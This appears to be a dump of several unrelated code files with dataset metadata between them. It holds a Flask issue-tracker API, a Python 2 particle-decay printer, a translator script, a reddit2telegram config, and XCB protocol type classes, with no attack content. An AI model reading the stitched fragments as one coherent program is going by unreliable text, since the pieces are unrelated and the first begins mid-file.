{
"count":1,
"handle_status":1
}
],
"total":1,
"version":3
},
{
"detail":[
{
"count":3,
"handle_status":4
}
],
"total":3,
"version":4
},
{
"detail":[
{
"count":1,
"handle_status":1
},
{
"count":1,
"handle_status":4
}
],
"total":2,
"version":128
}
],
"project_id":1
}
],
"message":"ok"
}
"""
data = IssueDashBoardBusiness.issue_project_id_dashboard(pro_id)
return json_detail_render(0, data)
# 绑定 issue 到 requirement
@issue.route('/bind/requirement', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_bind_requirement')
def issue_bind_requirement():
"""
@api {post} /v1/issue/bind/requirement 绑定 缺陷 issue 到 需求 requirement
@apiName IssueBindRequirement
@apiGroup 项目
@apiDescription 绑定 缺陷到需求
@apiParam {int} issue_id 缺陷 ID
@apiParam {int} requirement_id 需求 ID
@apiParamExample {json} Request-Example:
{
"issue": 11,
"requirement_id": 22
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
requirement_id, issue_id = parse_json_form('issue_bind_requirement')
ret, msg = IssueBusiness.issue_bind_requirement(issue_id, requirement_id)
return json_detail_render(ret, [], msg)
# 导出 issue 列表
@issue.route('/export', methods=['GET'])
def issue_export():
"""
@api {get} /v1/issue/ 导出 issue 到 xls
@apiName IssueExportToXls
@apiGroup 项目
@apiDescription 导出 issue 到 xls
@apiParam {int} [projectid] 项目 ID
@apiParam {int} [versionid] 版本 ID
@apiParam {int} [creator_id] 创建人 ID
@apiParam {int} [title] 标题
@apiParam {int} [handle_status] 处理状态 ID
@apiParam {int} [module_id] 模块 ID
@apiParam {int} [priority] 优先级 ID
@apiParam {int} [page_size] 分页 页面大小
@apiparam {int} [page_index] 分页 页数
@apiParamExample {json} Request-Example:
{
"projectid": 4,
"versionid": 173,
"page_size": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": "http://tcloud-static.oss-cn-beijing.aliyuncs.com/issue_export/0/Issues-20190809.164431.xls",
"message": "ok"
}
"""
issue_url = IssueBusiness.export()
return json_detail_render(code=0, data=issue_url) | en | 0.223038 | # 新增issue @api {post} /v1/issue 新增 缺陷 @apiName CreateIssue @apiGroup 项目 @apiDescription 新增 缺陷 @apiParam {int} module_id 模块 ID @apiParam {int} handler 处理人 ID @apiParam {int} issue_type 类型 @apiParam {int} chance 出现几率 @apiParam {int} level 级别 @apiParam {int} priority 优先级 @apiParam {int} system 系统 @apiParam {string} title 标题 @apiParam {string} attach 福建 @apiParam {string} description 描述 @apiParam {int} detection_chance 用户识别度 @apiParam {int} project_id 项目 ID @apiParam {int} version 版本 @apiParam {int} creator 创建人 ID @apiParam {int} modifier 修改人 ID @apiParam {int} [requirement_id] 关联的 需求 ID @apiParam {string} [tag] 标签 @apiParamExample {json} Request-Example: { "module_id": 340, "handler": 93, "issue_type": 0, "chance": 0, "level": 0, "priority": 0, "system": 4, "title": "123", "attach": "{\"images\":[],\"files\":[],\"videos\":[]}", "description": "<p>test</p>", "detection_chance": 0, "project_id": 4, "version": 168, "creator": 93, "modifier": 93, "requirement_id": 123, "tag": 13,14 } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [], "message": "ok" } # 根据id修改,删除issue @api {post} /v1/issue/{int:id} 修改 缺陷 @apiName ModifyIssue @apiGroup 项目 @apiDescription 修改 缺陷 @apiParam {int} module_id 模块 ID @apiParam {int} handler 处理人 ID @apiParam {int} issue_type 类型 @apiParam {int} chance 出现几率 @apiParam {int} level 级别 @apiParam {int} priority 优先级 @apiParam {int} system 系统 @apiParam {string} title 标题 @apiParam {string} attach 福建 @apiParam {string} description 描述 @apiParam {int} detection_chance 用户识别度 @apiParam {int} project_id 项目 ID @apiParam {int} version 版本 @apiParam {int} creator 创建人 ID @apiParam {int} modifier 修改人 ID @apiParam {int} [requirement_id] 关联的 需求 ID @apiParam {string} [tag] 标签 @apiParamExample {json} Request-Example: { "module_id": 340, "handler": 93, "issue_type": 0, "chance": 0, "level": 0, "priority": 0, "system": 4, "title": "123", "attach": "{\"images\":[],\"files\":[],\"videos\":[]}", "description": "<p>test</p>", "detection_chance": 0, "project_id": 4, "version": 168, "creator": 93, "modifier": 93, "requirement_id": 1, "tag": 13,14 } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [], "message": "ok" } # 根据id修改,删除issue @api {delete} /v1/issue/{int:id} 删除 缺陷 @apiName DeleteIssue @apiGroup 项目 @apiDescription 删除 缺陷 @apiParamExample {json} Request-Example: - @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [], "message": "ok" } # 切换issue状态 @api {post} /v1/issue/handlestatus/{int:id} 切换 缺陷状态 @apiName ModifyIssueStatus @apiGroup 项目 @apiDescription 切换 缺陷状态 @apiParamExample {json} Request-Example: { "handle_status": 1 } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [], "message": "ok" } # 切换issue处理人 @api {post} /v1/issue/handler/{int:id} 切换 缺陷处理人 @apiName ModifyIssueSwitch @apiGroup 项目 @apiDescription 切换 缺陷处理人 @apiParamExample {json} Request-Example: { "handler": 11 } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [], "message": "ok" } # 切换issue等级 @api {post} /v1/issue/level/{int:id} 切换 缺陷等级 @apiName ModifyIssueLevel @apiGroup 项目 @apiDescription 切换 缺陷等级 @apiParamExample {json} Request-Example: { "level": 3 } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [], "message": "ok" } # 切换issue优先级 @api {post} /v1/issue/priority/{int:id} 切换 缺陷优先级 @apiName ModifyIssuePriority @apiGroup 项目 @apiDescription 切换 缺陷优先级 @apiParamExample {json} Request-Example: { "priority": 3 } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [], "message": "ok" } # 修改issue的comment @api {post} /v1/issue/comment/{int:id} 切换 缺陷备注 @apiName ModifyIssueComment @apiGroup 项目 @apiDescription 切换 缺陷备注 @apiParamExample {json} Request-Example: { "comment": 3 } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [], "message": "ok" } # 查询issue-projectid,versionid @api {get} /v1/issue/ 查询 issue 列表 @apiName SearchIssue @apiGroup 项目 @apiDescription 查询 issue 列表 @apiParam {int} [projectid] 项目 ID @apiParam {int} [versionid] 版本 ID @apiParam {string} [creator_id] 创建人 ID,使用 ',' 分割 @apiParam {string} [handler_id] 处理人 ID,使用 ',' 分割 @apiParam {int} [title] 标题 @apiParam {string} [handle_status] 处理状态 ID,使用 ',' 分割 @apiParam {string} [module_id] 模块 ID,使用 ',' 分割 @apiParam {string} [priority] 优先级 ID,使用 ',' 分割 @apiParam {int} [page_size] 分页 页面大小 @apiparam {int} [page_index] 分页 页数 @apiParamExample {json} Request-Example: { "projectid": 4, "versionid": 173, "creator_id": "1,2,3,4", "page_size": 1 } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [ { "attach": "{"images":[],"files":[],"videos":[]}", "chance": 2, "comment": "", "creation_time": "2019-08-08 20:58:49", "creator": [ { "id": 96, "name": "张宇" } ], "description": "", "detection_chance": "", "handle_status": 2, "handler": [ { "id": 96, "name": "张宇" } ], "issue_number": "T398", "issue_type": 1, "issueid": 398, "level": 1, "modified_time": "2019-08-08 20:58:49", "modifier": [], "module": [ { "id": 329, "name": "用例二级2222" } ], "priority": 1, "project_id": 4, "rank": 12, "reopen": 0, "repair_time": "", "requirement_id": "", "requirement_title": "", "stage": "", "status": 0, "system": "", "test_time": "", "title": "1.2.7issuse55555", "version": [ { "id": 173, "name": "1.2.7" } ], "weight": "" } ], "message": "ok", "page_index": 1, "page_size": 1, "total": 8 } # 查询issue历史记录 @api {get} /v1/issue/record 查询 缺陷历史记录列表 @apiName GetIssueRecordList @apiGroup 项目 @apiDescription 查询 缺陷历史记录列表 @apiParam {int} projectid 项目 ID @apiParam {int} versionid 版本 ID @apiParamExample {json} Request-Example: ?projectid=1 @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [ { "attach": "{"images":[],"files":[],"videos":[]}", "chance": 0, "comment": "", "creation_time": "2019-05-10 16:23:28", "creator": [ { "id": 12, "name": "刘焕焕" } ], "description": "<p>分享微信不成功.</p>", "detection_chance": 0, "handle_status": 1, "handler": [ { "id": 12, "name": "刘焕焕" } ], "issue_number": "T309", "issue_type": 0, "issueid": 309, "level": 1, "modified_time": "2019-05-13 13:02:45", "modifier": [], "module": [ { "id": 291, "name": "V2.4.9版本用例飞科" } ], "priority": 1, "project_id": 1, "rank": 20, "reopen": 0, "repair_time": "", "requirement_id": "", "requirement_title": "", "stage": "", "status": 0, "system": 1, "test_time": "", "title": "分享微信不成功", "version": [ { "id": 128, "name": "V2.4.9" } ], "weight": "" } ], "message": "ok" } # 查询issue历史记录详情 @api {get} /v1/issue/record/detail/{int:issue_id} 查询 缺陷历史记录详情 @apiName GetIssueRecordDetailById @apiGroup 项目 @apiDescription 查询 缺陷历史记录详情 @apiParamExample {json} Request-Example: - @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [ { "modified_time": "2018-12-19 14:59:34", "modifier_id": 1, "modifier_name": "王金龙", "operation": "修改了处理状态 待办 为 处理中" }, { "modified_time": "2018-12-18 20:28:39", "modifier_id": 1, "modifier_name": "王金龙", "operation": "创建了BUG title" } ], "message": "ok" } # 根据id查询issue @api {get} /v1/issue/{int:issue_id} 查询 缺陷详情 (id) @apiName GetIssueById @apiGroup 项目 @apiDescription 查询 缺陷详情 通过 ID @apiParamExample {json} Request-Example: - @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code":0, "data":[ { "attach":"attach", "chance":1, "comment":"", "creation_time":"2018-12-18 20:28:39", "creator":[ { "id":1, "name":"王金龙" } ], "description":"description", "handle_status":3, "handler":[ { "id":1, "name":"王金龙" } ], "issue_number":"T1", "issue_type":1, "issueid":1, "level":1, "modified_time":"2019-03-01 16:46:10", "modifier":[ { "id":1, "name":"王金龙" } ], "module":[ { "id":1, "name":"音频" } ], "priority":1, "project_id":1, "reopen":0, "repair_time":"0:00:05", "requirement_id":"", "requirement_title":"", "stage":1, "status":0, "system":0, "test_time":"2 days, 20:21:05", "title":"title", "version":[ { "id":1, "name":"str" } ], "weight":"" } ], "message":"ok" } # issue关闭和打开的dashboard # 查询测试人员每天创建的issue个数 # issue的状态分布和优先级分布 @api {POST} /v1/issue/dashboard/project 查询 缺陷状态分布和优先级分布 @apiName GetIssueByStatusAndPriority @apiGroup 项目 @apiDescription 查询 缺陷状态分布和优先级分布 @apiParamExample {json} Request-Example: { "start_date": "2019-01-02 10:10:11", "end_date": "2019-01-03 10:10:12", } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [ { "modified_time": "2018-12-19 14:59:34", "modifier_id": 1, "modifier_name": "王金龙", "operation": "修改了处理状态 待办 为 处理中" }, { "modified_time": "2018-12-18 20:28:39", "modifier_id": 1, "modifier_name": "王金龙", "operation": "创建了BUG title" } ], "message": "ok" } # 看板根据pro_id查询issue各个状态的数量 @api {post} /v1/issue/dashboard/project/{int:project_id} 查询 看板缺陷 根据 project ID @apiName GetBoardIssueByProjectId @apiGroup 项目 @apiDescription 根据 project ID 查询 看板缺陷 @apiParamExample {json} Request-Example: - @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code":0, "data":[ { "info":[ { "detail":[ { "count":1, "handle_status":1 }, { "count":1, "handle_status":2 }, { "count":1, "handle_status":3 } ], "total":3, "version":1 }, { "detail":[ { "count":1, "handle_status":4 } ], "total":1, "version":2 }, { "detail":[ { "count":1, "handle_status":1 } ], "total":1, "version":3 }, { "detail":[ { "count":3, "handle_status":4 } ], "total":3, "version":4 }, { "detail":[ { "count":1, "handle_status":1 }, { "count":1, "handle_status":4 } ], "total":2, "version":128 } ], "project_id":1 } ], "message":"ok" } # 绑定 issue 到 requirement @api {post} /v1/issue/bind/requirement 绑定 缺陷 issue 到 需求 requirement @apiName IssueBindRequirement @apiGroup 项目 @apiDescription 绑定 缺陷到需求 @apiParam {int} issue_id 缺陷 ID @apiParam {int} requirement_id 需求 ID @apiParamExample {json} Request-Example: { "issue": 11, "requirement_id": 22 } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": [], "message": "ok" } # 导出 issue 列表 @api {get} /v1/issue/ 导出 issue 到 xls @apiName IssueExportToXls @apiGroup 项目 @apiDescription 导出 issue 到 xls @apiParam {int} [projectid] 项目 ID @apiParam {int} [versionid] 版本 ID @apiParam {int} [creator_id] 创建人 ID @apiParam {int} [title] 标题 @apiParam {int} [handle_status] 处理状态 ID @apiParam {int} [module_id] 模块 ID @apiParam {int} [priority] 优先级 ID @apiParam {int} [page_size] 分页 页面大小 @apiparam {int} [page_index] 分页 页数 @apiParamExample {json} Request-Example: { "projectid": 4, "versionid": 173, "page_size": 1 } @apiSuccessExample {json} Success-Response: HTTP/1.1 200 OK { "code": 0, "data": "http://tcloud-static.oss-cn-beijing.aliyuncs.com/issue_export/0/Issues-20190809.164431.xls", "message": "ok" } | 2.221668 | 2 |
PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | 0 | 10321 | # <NAME>, DESY
# <EMAIL>
#
# this tool is based on Luca Lista's tree drawer module
class ParticleDecayDrawer(object):
"""Draws particle decay tree """
def __init__(self):
print "Init particleDecayDrawer"
# booleans: printP4 printPtEtaPhi printVertex
def _accept(self, candidate, skipList):
if candidate in skipList: return False;
return self._select(candidate)
def _select(self, candidate):
return candidate.status() == 3
def _hasValidDaughters(self, candidate):
nDaughters = candidate.numChildren()
for i in xrange(nDaughters):
if self._select(candidate.listChildren()[i]): return True
return False
def _printP4(self, candidate):
return " "
def _decay(self, candidate, skipList):
out = str()
if candidate in skipList:
return ""
skipList.append(candidate)
id = candidate.pdg_id()
# here the part about the names :-(
out += str(id) + self._printP4(candidate)
validDau = 0
nOfDaughters = candidate.numChildren()
for i in xrange(nOfDaughters):
if self._accept(candidate.listChildren()[i], skipList): validDau+=1
if validDau == 0: return out
out += " ->"
for i in xrange(nOfDaughters):
d = candidate.listChildren()[i]
if self._accept(d, skipList):
decString = self._decay(d, skipList)
if ("->" in decString): out += " ( %s ) " %decString
else: out += " %s" %decString
return out
def draw(self, particles):
""" draw decay tree from list(HepMC.GenParticles)"""
skipList = []
nodesList = []
momsList = []
for particle in particles:
if particle.numParents() > 1:
if self._select(particle):
skipList.append(particle)
nodesList.append(particle)
for j in xrange(particle.numParents()):
mom = particle.listParents()[j]
while (mom.mother()):# != None ):
mom = mom.mother()
if self._select(mom):
momsList.append(mom)
print "-- decay --"
if len(momsList) > 0:
if len(momsList) > 1:
for m in xrange(len(momsList)):
decString = self._decay( momsList[m], skipList)
if len(decString) > 0:
print "{ %s } " %decString
else:
print self._decay(momsList[0], skipList)
if len(nodesList) > 0:
print "-> "
if len(nodesList) > 1:
for node in nodesList:
skipList.remove(node)
decString = self._decay(node, skipList)
if len(decString) > 0:
if "->" in decString: print " ( %s ) " %decString
else: print " " + decString
else:
skipList.remove(nodesList[0])
print self._decay(nodesList[0], skipList)
print
| # <NAME>, DESY
# <EMAIL>
#
# this tool is based on Luca Lista's tree drawer module
class ParticleDecayDrawer(object):
"""Draws particle decay tree """
def __init__(self):
print "Init particleDecayDrawer"
# booleans: printP4 printPtEtaPhi printVertex
def _accept(self, candidate, skipList):
if candidate in skipList: return False;
return self._select(candidate)
def _select(self, candidate):
return candidate.status() == 3
def _hasValidDaughters(self, candidate):
nDaughters = candidate.numChildren()
for i in xrange(nDaughters):
if self._select(candidate.listChildren()[i]): return True
return False
def _printP4(self, candidate):
return " "
def _decay(self, candidate, skipList):
out = str()
if candidate in skipList:
return ""
skipList.append(candidate)
id = candidate.pdg_id()
# here the part about the names :-(
out += str(id) + self._printP4(candidate)
validDau = 0
nOfDaughters = candidate.numChildren()
for i in xrange(nOfDaughters):
if self._accept(candidate.listChildren()[i], skipList): validDau+=1
if validDau == 0: return out
out += " ->"
for i in xrange(nOfDaughters):
d = candidate.listChildren()[i]
if self._accept(d, skipList):
decString = self._decay(d, skipList)
if ("->" in decString): out += " ( %s ) " %decString
else: out += " %s" %decString
return out
def draw(self, particles):
""" draw decay tree from list(HepMC.GenParticles)"""
skipList = []
nodesList = []
momsList = []
for particle in particles:
if particle.numParents() > 1:
if self._select(particle):
skipList.append(particle)
nodesList.append(particle)
for j in xrange(particle.numParents()):
mom = particle.listParents()[j]
while (mom.mother()):# != None ):
mom = mom.mother()
if self._select(mom):
momsList.append(mom)
print "-- decay --"
if len(momsList) > 0:
if len(momsList) > 1:
for m in xrange(len(momsList)):
decString = self._decay( momsList[m], skipList)
if len(decString) > 0:
print "{ %s } " %decString
else:
print self._decay(momsList[0], skipList)
if len(nodesList) > 0:
print "-> "
if len(nodesList) > 1:
for node in nodesList:
skipList.remove(node)
decString = self._decay(node, skipList)
if len(decString) > 0:
if "->" in decString: print " ( %s ) " %decString
else: print " " + decString
else:
skipList.remove(nodesList[0])
print self._decay(nodesList[0], skipList)
print
| en | 0.722725 | # <NAME>, DESY # <EMAIL> # # this tool is based on Luca Lista's tree drawer module Draws particle decay tree # booleans: printP4 printPtEtaPhi printVertex # here the part about the names :-( draw decay tree from list(HepMC.GenParticles) # != None ): | 2.957251 | 3 |
translator.py | liuprestin/pyninjaTUT-translator | 0 | 10322 | <gh_stars>0
from translate import Translator
translator = Translator(to_lang="zh")
try:
with open('./example.md', mode='r') as in_file:
text = in_file.read()
with open('./example-tranlated.md', mode='w') as trans_file:
trans_file.write(translator.translate(text))
except FileNotFoundError as e:
print('check your file path') | from translate import Translator
translator = Translator(to_lang="zh")
try:
with open('./example.md', mode='r') as in_file:
text = in_file.read()
with open('./example-tranlated.md', mode='w') as trans_file:
trans_file.write(translator.translate(text))
except FileNotFoundError as e:
print('check your file path') | none | 1 | 3.014315 | 3 |
|
reddit2telegram/channels/news/app.py | mainyordle/reddit2telegram | 187 | 10323 | #encoding:utf-8
from utils import weighted_random_subreddit
t_channel = '@news756'
subreddit = weighted_random_subreddit({
'politics': 0.5,
'news': 0.5
})
def send_post(submission, r2t):
return r2t.send_simple(submission,
text='{title}\n\n{self_text}\n\n/r/{subreddit_name}\n{short_link}',
gif='{title}\n\n/r/{subreddit_name}\n{short_link}',
img='{title}\n\n/r/{subreddit_name}\n{short_link}',
album='{title}\n{link}\n\n/r/{subreddit_name}\n{short_link}',
other='{title}\n{link}\n\n/r/{subreddit_name}\n{short_link}'
)
| #encoding:utf-8
from utils import weighted_random_subreddit
t_channel = '@news756'
subreddit = weighted_random_subreddit({
'politics': 0.5,
'news': 0.5
})
def send_post(submission, r2t):
return r2t.send_simple(submission,
text='{title}\n\n{self_text}\n\n/r/{subreddit_name}\n{short_link}',
gif='{title}\n\n/r/{subreddit_name}\n{short_link}',
img='{title}\n\n/r/{subreddit_name}\n{short_link}',
album='{title}\n{link}\n\n/r/{subreddit_name}\n{short_link}',
other='{title}\n{link}\n\n/r/{subreddit_name}\n{short_link}'
)
| en | 0.735217 | #encoding:utf-8 | 2.509786 | 3 |
xcbgen/xtypes.py | tizenorg/framework.uifw.xorg.xcb.xcb-proto | 1 | 10324 | '''
This module contains the classes which represent XCB data types.
'''
from xcbgen.expr import Field, Expression
import __main__
class Type(object):
'''
Abstract base class for all XCB data types.
Contains default fields, and some abstract methods.
'''
def __init__(self, name):
'''
Default structure initializer. Sets up default fields.
Public fields:
name is a tuple of strings specifying the full type name.
size is the size of the datatype in bytes, or None if variable-sized.
nmemb is 1 for non-list types, None for variable-sized lists, otherwise number of elts.
booleans for identifying subclasses, because I can't figure out isinstance().
'''
self.name = name
self.size = None
self.nmemb = None
self.resolved = False
# Screw isinstance().
self.is_simple = False
self.is_list = False
self.is_expr = False
self.is_container = False
self.is_reply = False
self.is_union = False
self.is_pad = False
self.is_switch = False
self.is_bitcase = False
def resolve(self, module):
'''
Abstract method for resolving a type.
This should make sure any referenced types are already declared.
'''
raise Exception('abstract resolve method not overridden!')
def out(self, name):
'''
Abstract method for outputting code.
These are declared in the language-specific modules, and
there must be a dictionary containing them declared when this module is imported!
'''
raise Exception('abstract out method not overridden!')
def fixed_size(self):
'''
Abstract method for determining if the data type is fixed-size.
'''
raise Exception('abstract fixed_size method not overridden!')
def make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto):
'''
Default method for making a data type a member of a structure.
Extend this if the data type needs to add an additional length field or something.
module is the global module object.
complex_type is the structure object.
see Field for the meaning of the other parameters.
'''
new_field = Field(self, field_type, field_name, visible, wire, auto)
# We dump the _placeholder_byte if any fields are added.
for (idx, field) in enumerate(complex_type.fields):
if field == _placeholder_byte:
complex_type.fields[idx] = new_field
return
complex_type.fields.append(new_field)
class SimpleType(Type):
'''
Derived class which represents a cardinal type like CARD32 or char.
Any type which is typedef'ed to cardinal will be one of these.
Public fields added:
none
'''
def __init__(self, name, size):
Type.__init__(self, name)
self.is_simple = True
self.size = size
self.nmemb = 1
def resolve(self, module):
self.resolved = True
def fixed_size(self):
return True
out = __main__.output['simple']
# Cardinal datatype globals. See module __init__ method.
tcard8 = SimpleType(('uint8_t',), 1)
tcard16 = SimpleType(('uint16_t',), 2)
tcard32 = SimpleType(('uint32_t',), 4)
tint8 = SimpleType(('int8_t',), 1)
tint16 = SimpleType(('int16_t',), 2)
tint32 = SimpleType(('int32_t',), 4)
tchar = SimpleType(('char',), 1)
tfloat = SimpleType(('float',), 4)
tdouble = SimpleType(('double',), 8)
class Enum(SimpleType):
'''
Derived class which represents an enum. Fixed-size.
Public fields added:
values contains a list of (name, value) tuples. value is empty, or a number.
bits contains a list of (name, bitnum) tuples. items only appear if specified as a bit. bitnum is a number.
'''
def __init__(self, name, elt):
SimpleType.__init__(self, name, 4)
self.values = []
self.bits = []
for item in list(elt):
# First check if we're using a default value
if len(list(item)) == 0:
self.values.append((item.get('name'), ''))
continue
# An explicit value or bit was specified.
value = list(item)[0]
if value.tag == 'value':
self.values.append((item.get('name'), value.text))
elif value.tag == 'bit':
self.values.append((item.get('name'), '%u' % (1 << int(value.text, 0))))
self.bits.append((item.get('name'), value.text))
def resolve(self, module):
self.resolved = True
def fixed_size(self):
return True
out = __main__.output['enum']
class ListType(Type):
'''
Derived class which represents a list of some other datatype. Fixed- or variable-sized.
Public fields added:
member is the datatype of the list elements.
parent is the structure type containing the list.
expr is an Expression object containing the length information, for variable-sized lists.
'''
def __init__(self, elt, member, *parent):
Type.__init__(self, member.name)
self.is_list = True
self.member = member
self.parents = list(parent)
if elt.tag == 'list':
elts = list(elt)
self.expr = Expression(elts[0] if len(elts) else elt, self)
elif elt.tag == 'valueparam':
self.expr = Expression(elt, self)
self.size = member.size if member.fixed_size() else None
self.nmemb = self.expr.nmemb if self.expr.fixed_size() else None
def make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto):
if not self.fixed_size():
# We need a length field.
# Ask our Expression object for it's name, type, and whether it's on the wire.
lenfid = self.expr.lenfield_type
lenfield_name = self.expr.lenfield_name
lenwire = self.expr.lenwire
needlen = True
# See if the length field is already in the structure.
for parent in self.parents:
for field in parent.fields:
if field.field_name == lenfield_name:
needlen = False
# It isn't, so we need to add it to the structure ourself.
if needlen:
type = module.get_type(lenfid)
lenfield_type = module.get_type_name(lenfid)
type.make_member_of(module, complex_type, lenfield_type, lenfield_name, True, lenwire, False)
# Add ourself to the structure by calling our original method.
Type.make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto)
def resolve(self, module):
if self.resolved:
return
self.member.resolve(module)
self.expr.resolve(module, self.parents)
# Find my length field again. We need the actual Field object in the expr.
# This is needed because we might have added it ourself above.
if not self.fixed_size():
for parent in self.parents:
for field in parent.fields:
if field.field_name == self.expr.lenfield_name and field.wire:
self.expr.lenfield = field
break
self.resolved = True
def fixed_size(self):
return self.member.fixed_size() and self.expr.fixed_size()
class ExprType(Type):
'''
Derived class which represents an exprfield. Fixed size.
Public fields added:
expr is an Expression object containing the value of the field.
'''
def __init__(self, elt, member, *parents):
Type.__init__(self, member.name)
self.is_expr = True
self.member = member
self.parents = parents
self.expr = Expression(list(elt)[0], self)
self.size = member.size
self.nmemb = 1
def resolve(self, module):
if self.resolved:
return
self.member.resolve(module)
self.resolved = True
def fixed_size(self):
return True
class PadType(Type):
'''
Derived class which represents a padding field.
'''
def __init__(self, elt):
Type.__init__(self, tcard8.name)
self.is_pad = True
self.size = 1
self.nmemb = 1 if (elt == None) else int(elt.get('bytes'), 0)
def resolve(self, module):
self.resolved = True
def fixed_size(self):
return True
class ComplexType(Type):
'''
Derived class which represents a structure. Base type for all structure types.
Public fields added:
fields is an array of Field objects describing the structure fields.
'''
def __init__(self, name, elt):
Type.__init__(self, name)
self.is_container = True
self.elt = elt
self.fields = []
self.nmemb = 1
self.size = 0
self.lenfield_parent = [self]
def resolve(self, module):
if self.resolved:
return
pads = 0
# Resolve all of our field datatypes.
for child in list(self.elt):
if child.tag == 'pad':
field_name = 'pad' + str(pads)
fkey = 'CARD8'
type = PadType(child)
pads = pads + 1
visible = False
elif child.tag == 'field':
field_name = child.get('name')
fkey = child.get('type')
type = module.get_type(fkey)
visible = True
elif child.tag == 'exprfield':
field_name = child.get('name')
fkey = child.get('type')
type = ExprType(child, module.get_type(fkey), *self.lenfield_parent)
visible = False
elif child.tag == 'list':
field_name = child.get('name')
fkey = child.get('type')
type = ListType(child, module.get_type(fkey), *self.lenfield_parent)
visible = True
elif child.tag == 'valueparam':
field_name = child.get('value-list-name')
fkey = 'CARD32'
type = ListType(child, module.get_type(fkey), *self.lenfield_parent)
visible = True
elif child.tag == 'switch':
field_name = child.get('name')
# construct the switch type name from the parent type and the field name
field_type = self.name + (field_name,)
type = SwitchType(field_type, child, *self.lenfield_parent)
visible = True
type.make_member_of(module, self, field_type, field_name, visible, True, False)
type.resolve(module)
continue
else:
# Hit this on Reply
continue
# Get the full type name for the field
field_type = module.get_type_name(fkey)
# Add the field to ourself
type.make_member_of(module, self, field_type, field_name, visible, True, False)
# Recursively resolve the type (could be another structure, list)
type.resolve(module)
self.calc_size() # Figure out how big we are
self.resolved = True
def calc_size(self):
self.size = 0
for m in self.fields:
if not m.wire:
continue
if m.type.fixed_size():
self.size = self.size + (m.type.size * m.type.nmemb)
else:
self.size = None
break
def fixed_size(self):
for m in self.fields:
if not m.type.fixed_size():
return False
return True
class SwitchType(ComplexType):
'''
Derived class which represents a List of Items.
Public fields added:
bitcases is an array of Bitcase objects describing the list items
'''
def __init__(self, name, elt, *parents):
ComplexType.__init__(self, name, elt)
self.parents = parents
# FIXME: switch cannot store lenfields, so it should just delegate the parents
self.lenfield_parent = list(parents) + [self]
# self.fields contains all possible fields collected from the Bitcase objects,
# whereas self.items contains the Bitcase objects themselves
self.bitcases = []
self.is_switch = True
elts = list(elt)
self.expr = Expression(elts[0] if len(elts) else elt, self)
def resolve(self, module):
if self.resolved:
return
# pads = 0
parents = list(self.parents) + [self]
# Resolve all of our field datatypes.
for index, child in enumerate(list(self.elt)):
if child.tag == 'bitcase':
field_name = child.get('name')
if field_name is None:
field_type = self.name + ('bitcase%d' % index,)
else:
field_type = self.name + (field_name,)
# use self.parent to indicate anchestor,
# as switch does not contain named fields itself
type = BitcaseType(index, field_type, child, *parents)
# construct the switch type name from the parent type and the field name
if field_name is None:
type.has_name = False
# Get the full type name for the field
field_type = type.name
visible = True
# add the field to ourself
type.make_member_of(module, self, field_type, field_name, visible, True, False)
# recursively resolve the type (could be another structure, list)
type.resolve(module)
inserted = False
for new_field in type.fields:
# We dump the _placeholder_byte if any fields are added.
for (idx, field) in enumerate(self.fields):
if field == _placeholder_byte:
self.fields[idx] = new_field
inserted = True
break
if False == inserted:
self.fields.append(new_field)
self.calc_size() # Figure out how big we are
self.resolved = True
def make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto):
if not self.fixed_size():
# We need a length field.
# Ask our Expression object for it's name, type, and whether it's on the wire.
lenfid = self.expr.lenfield_type
lenfield_name = self.expr.lenfield_name
lenwire = self.expr.lenwire
needlen = True
# See if the length field is already in the structure.
for parent in self.parents:
for field in parent.fields:
if field.field_name == lenfield_name:
needlen = False
# It isn't, so we need to add it to the structure ourself.
if needlen:
type = module.get_type(lenfid)
lenfield_type = module.get_type_name(lenfid)
type.make_member_of(module, complex_type, lenfield_type, lenfield_name, True, lenwire, False)
# Add ourself to the structure by calling our original method.
Type.make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto)
# size for switch can only be calculated at runtime
def calc_size(self):
pass
# note: switch is _always_ of variable size, but we indicate here wether
# it contains elements that are variable-sized themselves
def fixed_size(self):
return False
# for m in self.fields:
# if not m.type.fixed_size():
# return False
# return True
class Struct(ComplexType):
'''
Derived class representing a struct data type.
'''
out = __main__.output['struct']
class Union(ComplexType):
'''
Derived class representing a union data type.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.is_union = True
out = __main__.output['union']
class BitcaseType(ComplexType):
'''
Derived class representing a struct data type.
'''
def __init__(self, index, name, elt, *parent):
elts = list(elt)
self.expr = Expression(elts[0] if len(elts) else elt, self)
ComplexType.__init__(self, name, elts[1:])
self.has_name = True
self.index = 1
self.lenfield_parent = list(parent) + [self]
self.parents = list(parent)
self.is_bitcase = True
def make_member_of(self, module, switch_type, field_type, field_name, visible, wire, auto):
'''
register BitcaseType with the corresponding SwitchType
module is the global module object.
complex_type is the structure object.
see Field for the meaning of the other parameters.
'''
new_field = Field(self, field_type, field_name, visible, wire, auto)
